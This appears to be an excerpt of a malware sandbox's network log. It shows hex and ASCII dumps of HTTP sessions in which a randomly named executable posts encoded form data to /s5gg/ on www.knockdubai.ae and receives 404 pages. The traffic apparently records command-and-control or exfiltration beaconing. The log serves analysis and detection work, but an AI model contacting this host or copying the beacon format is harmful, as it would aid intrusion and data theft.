May 27, 2024 12:22:51.843101978 CEST	1236	IN	Data Raw: 2f 45 71 79 39 72 49 53 6c 57 30 6a 4c 33 68 78 34 56 6d 46 47 46 34 70 74 78 43 6a 6c 65 55 53 52 35 7a 73 7a 46 79 56 2b 4b 55 31 67 32 6f 38 64 7a 73 45 53 33 75 78 67 70 62 4e 74 31 56 6c 67 54 64 56 61 75 31 61 6f 69 6b 32 55 45 4b 4d 49 64 Data Ascii: /Eqy9rISlW0jL3hx4VmFGF4ptxCjleUSR5zszFyV+KU1g2o8dzsES3uxgpbNt1VlgTdVau1aoik2UEKMId+sJRxr3HkSsmzjGq2vyMJSqd0rhVIx+04fJzkTfJhsJIa5nxkLEUTSBqunjdK1J43avY+GUHtkCcj/DtJ4B/uSNEIkMZr2WRokyXZu++Goc+suCZKgta0jZ+5JtvGmgMbS3nBllxBmTvID7zeRn37poRbZHfnodOA
May 27, 2024 12:22:51.853596926 CEST	1236	IN	Data Raw: 55 61 62 37 79 73 77 48 54 6c 73 4f 4c 45 37 4a 51 75 33 4c 4d 7a 67 53 2f 63 74 6a 2b 65 41 47 35 49 43 68 6a 33 61 49 7a 65 63 6b 30 77 2f 63 48 43 4c 77 65 51 71 61 39 63 36 52 65 66 33 75 52 4b 4f 55 72 58 4f 6f 54 65 76 50 37 4c 43 54 77 7a Data Ascii: Uab7yswHTlsOLE7JQu3LMzgS/ctj+eAG5IChj3aIzeck0w/cHCLweQqa9c6Ref3uRKOUrXOoTevP7LCTwz3mIEmIgSTFuegT9/TRprV5qQXdG9rpMkc3DEzklUTmLIVfTMKiTgY30bL1ZEI2Wte2JASXS/R0KpuRjoUikURNeLJFYnQKfBS/L1czYmY1XGSwqRPP/3z1PcgKmWpkNHHWbLwzveHGKQXiqkAY0USmvNwEe+4OPZI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.12	49761	103.120.178.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:53.359325886 CEST	717	OUT	POST /s5gg/ HTTP/1.1 Host: www.knockdubai.ae Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.knockdubai.ae Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.knockdubai.ae/s5gg/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 47 63 5a 58 78 43 33 32 35 57 74 6e 50 5a 39 57 66 6c 70 56 68 46 53 2b 74 2f 73 58 2b 72 75 72 39 46 59 7a 73 63 69 6c 42 2b 35 65 58 58 61 71 59 6b 35 37 32 32 57 65 46 64 7a 63 59 41 36 48 30 6d 6f 57 37 53 30 67 66 64 72 6d 4d 6f 30 2b 4b 67 61 39 56 57 6d 66 4a 68 35 7a 52 39 6a 53 4f 4b 6c 34 6b 6b 74 77 6a 71 47 63 6a 41 61 6a 44 7a 71 2f 39 73 64 4e 74 78 57 70 57 63 42 52 37 78 4e 67 45 58 48 6c 45 4c 4d 37 6a 66 2b 7a 35 4d 5a 6c 78 31 78 30 7a 55 58 48 6c 51 4e 73 71 4c 4f 43 66 32 42 7a 54 34 78 47 61 46 64 65 61 48 51 42 6d 55 49 4c 52 6b 6c 39 78 74 30 4f 49 41 7a 48 38 71 32 78 7a 6f 67 35 65 4c 47 43 68 49 55 75 2f 45 38 3d Data Ascii: VlEHDVvh=GcZXxC325WtnPZ9WflpVhFS+t/sX+rur9FYzscilB+5eXXaqYk5722WeFdzcYA6H0moW7S0gfdrmMo0+Kga9VWmfJh5zR9jSOKl4kktwjqGcjAajDzq/9sdNtxWpWcBR7xNgEXHlELM7jf+z5MZlx1x0zUXHlQNsqLOCf2BzT4xGaFdeaHQBmUILRkl9xt0OIAzH8q2xzog5eLGChIUu/E8=
May 27, 2024 12:22:54.407593012 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:22:54 GMT Server: Apache Last-Modified: Thu, 28 Dec 2023 09:40:51 GMT ETag: "500c-60d8eb618ba1d" Accept-Ranges: bytes Content-Length: 20492 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404 - Page not found!</title> <link rel="icon" type="image/png" href="../favicon.ico"><style> html { height: 80%; } body { text-align:left; height:100%; background: #F3F3F3; font-size: 62.5%; font-family: 'Lucida Grande', Verdana, Arial, Sans-Serif; margin-top:10px; margin-bottom:10px; margin-right:10px; margin-left:10px; padding:0px; } body,td,th { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9pt; color: #3333
May 27, 2024 12:22:54.407609940 CEST	224	IN	Data Raw: 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 Data Ascii: 33; } h1,h2,h3,h4,h5,h6 { font-family: Geneva, Arial, Helvetica, sans-serif; } h1 { font-size: 28px; font-weight:bold;
May 27, 2024 12:22:54.407624006 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 36 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 33 70 78 20 33 70 78 20 35 70 78 20 23 42 42 42 42 42 42 3b 0d 0a 20 20 20 Data Ascii: color: #336; text-shadow:3px 3px 5px #BBBBBB; } a:link,a:visited,a:hover,a:active { color: #336; text-decoration:none; } #ovilink a:
May 27, 2024 12:22:54.407727957 CEST	1236	IN	Data Raw: 41 43 43 4b 74 4b 67 41 44 43 36 69 53 41 41 4d 4b 71 45 69 43 41 73 41 6f 43 42 42 42 57 51 59 41 41 77 69 6f 49 45 45 42 59 6b 79 4a 41 41 47 46 56 43 52 42 41 57 41 55 42 41 67 69 72 6a 77 41 43 43 47 74 30 41 41 51 51 56 75 30 41 41 59 52 56 Data Ascii: ACCKtKgADC6iSAAMKqEiCAsAoCBBBWQYAAwioIEEBYkyJAAGFVCRBAWAUBAgirjwACCGt0AAQQVu0AAYRVECCAsAoCBBDWAAEIMAAoCSZuy+v+UQAAAABJRU5ErkJggg==') repeat-x top; border:solid 1px #DFDFDF; margin: 10px 0; pad
May 27, 2024 12:22:54.407741070 CEST	1236	IN	Data Raw: 41 4e 53 55 68 45 55 67 41 41 41 47 51 41 41 41 42 63 43 41 59 41 41 41 43 59 79 78 43 55 41 41 41 41 42 47 64 42 54 55 45 41 41 4b 2f 49 4e 77 57 4b 36 51 41 41 41 42 6c 30 52 56 68 30 55 32 39 6d 64 48 64 68 63 6d 55 41 51 57 52 76 59 6d 55 67 Data Ascii: ANSUhEUgAAAGQAAABcCAYAAACYyxCUAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAC1nSURBVHja7H0JnF5lfe5z9vPt33wzk9myZ0JISEIgLEUiUKRQm2ovLtcWq9Wq1LZWbnNvbxfu9V69/NRLry2aSrVYNywibiiIoAIia1hDNkgmyUwms3/z7d93vrOf+7xnIIpKxjrGg
May 27, 2024 12:22:54.407752991 CEST	1236	IN	Data Raw: 44 2f 76 72 77 37 2f 59 71 76 41 53 58 65 6e 63 32 4b 33 59 66 48 48 38 74 6a 76 4e 67 48 33 35 42 51 61 30 30 6a 71 58 6f 34 63 37 32 47 31 59 4d 4f 65 70 4c 6e 41 44 71 4e 59 4b 51 52 79 53 70 47 78 6b 62 77 2b 4a 4d 4f 52 73 66 4a 49 33 6b 48 Data Ascii: D/vrw7/YqvASXenc2K3YfHH8tjvNgH35BQa00jqXo4c72G1YMOepLnADqNYKQRySpGxkbw+JMORsfJI3kHnakV8OQ0zjr1B1h3yhKC2oNs1E+3/wN4Xee9U8ts/deTfVkvcgSlu9K6rG6HmWQFz9LcVbD3cIRSZTENoAan3YRTkTDQM4ozN9TQk389Y1wCLHqPCo2ishhLV2axfLWKTDZJnilgqhbCgYSnDxZQr5eQ8qcQsSC5A
May 27, 2024 12:22:54.407763958 CEST	1236	IN	Data Raw: 67 43 53 6f 71 67 74 6d 65 52 56 54 72 68 32 34 39 73 6a 57 62 75 33 76 70 72 43 55 67 30 2f 56 58 64 43 4a 2b 35 58 74 64 37 45 43 6c 44 73 44 77 62 7a 78 79 32 63 50 6a 6f 61 6e 69 70 42 68 70 4f 6d 65 70 4a 77 39 72 46 56 57 78 61 32 63 30 62 Data Ascii: gCSoqgtmeRVTrh249sjWbu3vprCUg0/VXdCJ+5Xtd7EClDsDwbzxy2cPjoanipBhpOmepJw9rFVWxa2c0bpfFrteg7AkRMU6H4x0hgzTM6XKhUWSHBETwiy25cxM9o2RQDfdi47igWG7OwrA4yVROVho/HhlbCrtThuGwQjDg1bKDVfOw62Ef0XztAAmvs6nymNQhWmuu6qLQm8cQTEsKEh1qTJtCfhRRKWLu6hc6O9YyOCj2Hx
May 27, 2024 12:22:54.407778025 CEST	1236	IN	Data Raw: 71 39 6b 50 54 36 63 79 6e 4b 65 65 37 73 78 61 34 38 45 67 44 42 69 39 4f 59 6f 65 6e 51 56 59 4d 45 72 39 4a 35 71 30 4a 73 50 5a 66 61 67 72 67 45 6b 51 7a 5a 61 43 49 49 71 79 54 2f 41 72 47 64 51 45 37 75 77 76 6e 6e 6a 71 4d 67 6c 61 69 6b Data Ascii: q9kPT6cynKee7sxa48EgDBi9OYoenQVYMEr9J5q0JsPZfagrgEkQzZaCIIqyT/ArGdQE7uwvnnjqMglaikHQbqOCpeFfc/fQ5KVV47oaIdHOD7e9Eu3nUN6g8XfqUA8cZvV1T//usRrVIgT8KuB3j6SIBHmbsttuIgZAKxx3Hq8hpecTbVk98Ljy460uYAkASRi97cyD8GDAUyU1QUk/bcY8w9ikQNLHhjrjA6VDE9qwk/4vvkF
May 27, 2024 12:22:54.407789946 CEST	1236	IN	Data Raw: 67 4b 59 76 2f 52 45 6f 62 42 43 38 35 79 67 7a 77 79 34 4f 4b 69 43 77 34 68 57 64 50 69 48 6d 5a 66 53 56 46 31 42 66 6a 71 41 32 78 49 56 67 42 54 5a 56 53 36 4d 79 67 59 32 6f 42 56 2f 50 6a 56 4c 30 74 41 72 50 70 74 56 79 64 43 4c 49 57 54 Data Ascii: gKYv/REobBC85ygzwy4OKiCw4hWdPiHmZfSVF1BfjqA2xIVgBTZVS6MygY2oBV/PjVL0tArPptVydCLIWTYC4/jKl2HV//7jJWEr2BxwcO6uiIjuK8c2fRn+llbtPi2eyil1YQtljvIbGVK8jRoySoqBIERCIBOyiWLZRqUbwKAaEB16mg3SI5sxIrlo6JognLfyE3/niqer4o5BrxyvlnhDh3WR31ihx3TCoo4sFnu/Hkrg4kt
May 27, 2024 12:22:54.407802105 CEST	1236	IN	Data Raw: 71 73 62 6d 4f 52 6e 7a 75 4c 6c 35 53 34 42 4b 46 34 74 77 4a 56 64 2b 59 63 76 74 75 46 74 61 64 30 59 2f 4e 5a 4d 72 7a 61 4a 41 32 68 44 71 56 5a 77 74 52 34 47 76 63 2b 54 61 44 54 54 4a 45 55 4b 4c 72 57 67 33 62 31 6f 57 32 31 79 54 73 47 Data Ascii: qsbmORnzuLl5S4BKF4twJVd+YcvtuFtad0Y/NZMrzaJA2hDqVZwtR4Gvc+TaDTTJEUKLrWg3b1oW21yTsGX5KARIe2b0kEU2+RTWrWtgRTLuHL98kYGicnaGl0MAWgJGHLKypYvTxDXa9T5TrzAiK6PyJBxqJfihKX/yXBiiEO8oobxN0ugQDNpiCmZHUJUBRasbOXyDPi83Haiub6uESdx+8nwKIIGIW8DtGcA6RporvfwCvPC
May 27, 2024 12:22:54.418256044 CEST	1236	IN	Data Raw: 37 7a 65 52 6e 33 37 70 6f 52 62 5a 48 66 6e 6f 64 4f 41 50 37 77 4b 68 4a 6b 59 53 4f 72 63 68 53 6c 55 51 4d 64 50 55 78 6a 74 57 6d 2b 52 71 58 46 6c 6e 37 38 45 47 54 61 6f 2b 58 32 68 65 32 32 32 77 67 4e 50 2b 37 46 62 54 53 72 6d 43 45 76 Data Ascii: 7zeRn37poRbZHfnodOAP7wKhJkYSOrchSlUQMdPUxjtWm+RqXFln78EGTao+X2he222wgNP+7FbTSrmCEvlUKax/AodLkTzTojgWmw3uiHRWWUtpJoBu4xvojJXQpf8P+Emo7ne+mm8EE0qe0uqFqRPFWCRLMIgviety7DXUNDKI4lkVYC2MEi/P1NB3HJK00sKqxGTlqCduNwujp567X5Vf/1zf8x4yGlh9PRU699tqFVB6R2H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.12	49762	103.120.178.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:55.889832973 CEST	1730	OUT	POST /s5gg/ HTTP/1.1 Host: www.knockdubai.ae Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.knockdubai.ae Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.knockdubai.ae/s5gg/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 47 63 5a 58 78 43 33 32 35 57 74 6e 50 5a 39 57 66 6c 70 56 68 46 53 2b 74 2f 73 58 2b 72 75 72 39 46 59 7a 73 63 69 6c 42 2b 78 65 58 47 36 71 59 48 52 37 34 57 57 65 4d 39 7a 52 59 41 36 67 30 69 45 53 37 53 49 57 66 66 6a 6d 4e 4a 55 2b 43 31 32 39 62 57 6d 66 4c 68 35 77 4d 4e 6a 48 4f 4b 31 38 6b 6b 39 77 6a 71 47 63 6a 43 43 6a 44 69 71 2f 78 4d 64 4d 39 68 57 6c 53 63 42 39 37 78 56 77 45 55 72 71 48 37 73 37 6a 2b 4f 7a 71 70 74 6c 79 56 78 36 6e 30 58 66 6c 51 49 79 71 4c 53 30 66 79 42 64 54 36 68 47 4b 67 6c 47 49 7a 49 4d 6c 6e 63 4e 63 54 74 34 35 76 74 4e 51 53 76 77 37 6f 53 74 2f 36 51 76 5a 70 66 37 79 72 4d 54 37 41 68 71 42 37 2f 58 65 31 6b 2f 48 2b 74 45 34 6e 57 65 54 43 37 31 32 6f 57 54 61 62 74 50 76 36 57 51 4d 66 6a 6e 4f 76 6c 45 2f 6d 79 48 31 67 54 52 35 38 45 72 5a 46 51 79 31 63 68 62 4c 32 38 51 4a 63 62 53 39 49 33 44 50 78 71 56 65 77 65 6e 36 68 75 77 44 49 51 73 75 6b 35 41 49 6e 6f 33 5a 6f 61 7a 68 46 52 73 68 54 4b 76 46 57 42 69 30 [TRUNCATED] Data Ascii: VlEHDVvh=GcZXxC325WtnPZ9WflpVhFS+t/sX+rur9FYzscilB+xeXG6qYHR74WWeM9zRYA6g0iES7SIWffjmNJU+C129bWmfLh5wMNjHOK18kk9wjqGcjCCjDiq/xMdM9hWlScB97xVwEUrqH7s7j+OzqptlyVx6n0XflQIyqLS0fyBdT6hGKglGIzIMlncNcTt45vtNQSvw7oSt/6QvZpf7yrMT7AhqB7/Xe1k/H+tE4nWeTC712oWTabtPv6WQMfjnOvlE/myH1gTR58ErZFQy1chbL28QJcbS9I3DPxqVewen6huwDIQsuk5AIno3ZoazhFRshTKvFWBi0fvGucqnSpEIba5fBihd51kfYXMHJRYmtTUOtLNh8l33/TuvQgRz43VWTDt51rMnnBvEhPI7a+DhmVewX25kY6z1GPcLf+rnyTduPqIvOz2O+AlXq09G8Al58p38yRuCB9i2YipgXDzyYzpB3s3bN219Tkt+TYyryyUjV3EiDZVZ5tnhgn4DWAiR+lub3Q7mv9fjdxbI3CmqM51WTT3uzUa+rIrGCkHgu/Myp7K2QR8wlDi6jN0OFCbdxVzzANQOEwF9/+mUGZMsHVt+Tkr5ko0uPtqT8QwJLlGxxBK5z6NervNdTejlnSNpV2nWnaVAcNbzggMI3MLU96NRPy2Hzla5QwMtz9Oh4RTOCHSYz9u2SEi4R4xGKtvJOhCP0YOygqX/leICXAQVI1dnDMnJMIv0Xa60Q0M8fp5FMiCzw/kvkiOhYIILUEzq17U1jMAUCPxnLwqsDvdVsaH5TVN3Y33yDP6ZU0HA5B8ZLaOZtSccqL6av0coIMZo7T0/D06lNXTthBYNdRpVqYxIPLeyRCY+mksbYj8slBzXjw07pMMebVh25LC+sG9Q/E/jSBoH04XI9GX+XFzaSuANfJUOdGhfUzpF3pp8KwCjODnbkiG81Xrwkus1JHxVfp4l11mi3ABB5ubCWqybeU5B7mQIi8ToquGWypCKe2/ [TRUNCATED]
May 27, 2024 12:22:57.484515905 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:22:56 GMT Server: Apache Last-Modified: Thu, 28 Dec 2023 09:40:51 GMT ETag: "500c-60d8eb618ba1d" Accept-Ranges: bytes Content-Length: 20492 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404 - Page not found!</title> <link rel="icon" type="image/png" href="../favicon.ico"><style> html { height: 80%; } body { text-align:left; height:100%; background: #F3F3F3; font-size: 62.5%; font-family: 'Lucida Grande', Verdana, Arial, Sans-Serif; margin-top:10px; margin-bottom:10px; margin-right:10px; margin-left:10px; padding:0px; } body,td,th { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9pt; color: #3333
May 27, 2024 12:22:57.484534025 CEST	1236	IN	Data Raw: 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 Data Ascii: 33; } h1,h2,h3,h4,h5,h6 { font-family: Geneva, Arial, Helvetica, sans-serif; } h1 { font-size: 28px; font-weight:bold; colo
May 27, 2024 12:22:57.484546900 CEST	448	IN	Data Raw: 74 32 67 41 44 43 4b 67 67 51 51 46 67 46 41 51 49 49 71 30 55 41 41 59 52 56 4a 55 41 41 59 52 55 45 43 43 43 73 67 67 41 42 68 46 55 51 49 49 42 59 73 4e 6a 44 41 42 42 41 57 46 55 43 42 42 41 4c 41 77 4f 6d 55 6f 41 41 77 71 6f 53 49 49 43 77 Data Ascii: t2gADCKggQQFgFAQIIq0UAAYRVJUAAYRUECCCsggABhFUQIIBYsNjDABBAWFUCBBALAwOmUoAAwqoSIICwCgIEEFaLAAIIq0qAAMIqCBBAWAMEIICwqgQIIKyCAAGEVRAggLAKAgQQVkGAAMIqCBBAWJ0EEEBYVQIEEFZBgADCmmwAAgirSoAAwioIEEBYbQcIIKwqAQIIqyBAAGEVBAggrIIAAYQ14gACCKtKgADC6iSAAMKqE
May 27, 2024 12:22:57.484563112 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0d 0a Data Ascii: padding: 0 20px 10px; -moz-border-radius: 10px; border-radius: 10px; min-height: 90%; } .header_logo { display:block;
May 27, 2024 12:22:57.484616041 CEST	1236	IN	Data Raw: 39 33 76 72 4f 66 2b 37 78 6e 49 49 70 4b 78 6a 72 47 67 75 62 6b 39 2f 37 4f 5a 4c 37 6c 6e 50 4d 2b 37 2f 2f 2f 50 4d 2b 37 6a 52 52 46 45 55 34 65 4c 35 31 44 50 6c 6b 46 4a 77 45 35 65 52 7a 6e 55 46 2b 57 64 32 30 66 30 74 32 67 2f 43 59 58 Data Ascii: 93vrOf+7xnIIpKxjrGgubk9/7OZL7lnPM+7///PM+7jRRFEU4eL51DPlkFJwE5eRznUF+Wd20f0t2g/CYXtcsNy18K2d4cKO19kIOdspbdqamLH5W0M+97OT6a9HLjEK9xy5964ez7g6CrG0E/Mok+ILIQhk34YR1RaAOhJ976KMs7je437D4JyAk4GqXv9kbh1M2mnrlQ15cztpcSiCyg+TzrBIHZN34UF/CPwneG4fhF19fwY
May 27, 2024 12:22:57.484659910 CEST	1236	IN	Data Raw: 53 6e 44 78 5a 51 72 35 65 51 38 71 63 51 73 53 43 35 41 63 48 6b 59 39 63 35 77 64 6a 67 53 55 42 65 35 4a 69 70 37 48 68 2f 7a 6a 68 33 41 4d 33 48 71 4b 6f 55 7a 4d 36 4f 59 76 54 49 53 6a 54 44 46 70 70 4e 48 38 32 36 6a 62 37 2b 43 5a 79 78 Data Ascii: SnDxZQr5eQ8qcQsSC5AcHkY9c5wdjgSUBe5Jip7Hh/zjh3AM3HqKoUzM6OYvTISjTDFppNH826jb7+CZyx5lQklQv4AbpxguaGk7CU+6m0noGc7EX/ygTyS0bgRA5qXhJ16xBqfg6P7bSheEdo6ot8rROmL6Utu3LdSUB+ynF08oOb0rnwKujd8Btl4jGMR5/SYCGNpt1E4LaQcCMMLm1ixaqQjpHuPDXCbDUDPZxCgloLVohop
May 27, 2024 12:22:57.484673023 CEST	1236	IN	Data Raw: 52 4b 57 4c 75 36 68 63 36 4f 39 59 79 4f 43 6a 32 48 78 63 69 51 34 55 57 56 75 45 2f 4b 38 32 59 68 73 70 62 45 51 6a 49 68 68 77 54 77 42 41 67 38 53 33 49 51 56 33 4a 6f 48 2b 54 50 35 32 50 31 73 6a 49 47 65 77 2f 43 43 31 62 44 68 68 6a 6c Data Ascii: RKWLu6hc6O9YyOCj2HxciQ4UWVuE/K82YhspbEQjIhhwTwBAg8S3IQV3JoH+TP52P1sjIGew/CC1bDhhjlncWzpIyjI2NMdeSh4CixzvOzxcF69d5tv1aAtMc+Pqg69/5NO1xOTtgJ38pjx4EsjjRWsdIVaEUVnbUOnHnaw1hzWi8i+wDTUo3RMYsgqjMtGfCpsjTFi8dAVNUnrzcpf10CxQt4AStXhuKLFFeEV3sMhYGVGDwtg
May 27, 2024 12:22:57.484700918 CEST	1236	IN	Data Raw: 68 6a 72 6a 41 36 56 44 45 39 71 77 6b 2f 34 76 76 6b 46 50 79 77 42 64 58 7a 73 62 49 72 67 56 65 65 55 55 4e 61 61 6a 48 43 48 4b 69 4b 6a 55 4e 46 47 64 2f 62 75 77 54 74 6b 6f 49 55 78 74 68 51 75 70 48 30 39 78 65 38 6d 52 39 63 38 79 73 46 Data Ascii: hjrjA6VDE9qwk/4vvkFPywBdXzsbIrgVeeUUNaajHCHKiKjUNFGd/buwTtkoIUxthQupH09xe8mR9c8ysFSFT7xFVJvWuTZVBSNvsYHXvw4M5ezLay8CllPWYlI+zAGWc/ip7eHr6HHCHTxIkuEVa8KJEARArnSPq530kEpEpjV6s20GxasNtzKSwMw7mHo2JjS6BQsEn2CdhukyIhC1kbh9pYigvOd9GTseCGJqU0wVIP4f59A
May 27, 2024 12:22:57.484746933 CEST	1236	IN	Data Raw: 78 33 54 43 6f 6f 34 73 46 6e 75 2f 48 6b 72 67 34 6b 74 43 6d 6f 4a 71 4e 54 36 59 64 5a 33 37 48 4e 6e 76 6e 71 75 70 63 56 49 4d 48 52 61 7a 5a 35 7a 75 35 74 43 61 55 44 72 69 77 47 6a 7a 70 78 2f 77 4d 61 6e 70 33 32 34 31 35 5a 78 36 70 41 Data Ascii: x3TCoo4sFnu/Hkrg4ktCmoJqNT6YdZ37HNnvnqupcVIMHRazZ5zu5tCaUDriwGjzpx/wManp32415Zx6pAoiI6f/04TlkdMBaY7x0hVy06c9o/32fl12IgRKoTGca3o/gskRfabLW2FVE9Fams6LhJ+AGlrMsIs5niGvbcfRA7PmB4rIi+r+fPzxeYVGcOiVsfwGUXjSKjN2n6K3AabbTDLL7xQB4TpWFGeY6gOzSRfXqr/KlPv
May 27, 2024 12:22:57.484769106 CEST	776	IN	Data Raw: 57 38 44 74 47 63 41 36 52 70 6f 72 76 66 77 43 76 50 43 62 45 34 4d 59 6d 6f 59 7a 56 36 63 69 36 6d 69 6a 6f 2b 2b 36 30 51 52 77 35 55 45 56 6c 48 55 4a 73 39 7a 50 63 65 31 4f 33 68 6a 31 33 33 6b 67 4d 6b 71 4e 32 72 4e 36 74 66 2b 70 53 52 Data Ascii: W8DtGcA6RporvfwCvPCbE4MYmoYzV6ci6mijo++60QRw5UEVlHUJs9zPce1O3hj133kgMkqN2rN6tf+pSRGIDk2LGj3nVoAnf8IETFKUAxMnDLLlb3kcgvcmAyHZlJK56RKHpmj1eEMJBpCgV/iIkOQk0ZuhvPvQpcMXglxxU9FyUSHDHVh87dFKtzZT2u5BgIMagVA+Ljh91FITSNfKXwvZ5Ym0F+C8Ri0irW9AGXnmtjz6692
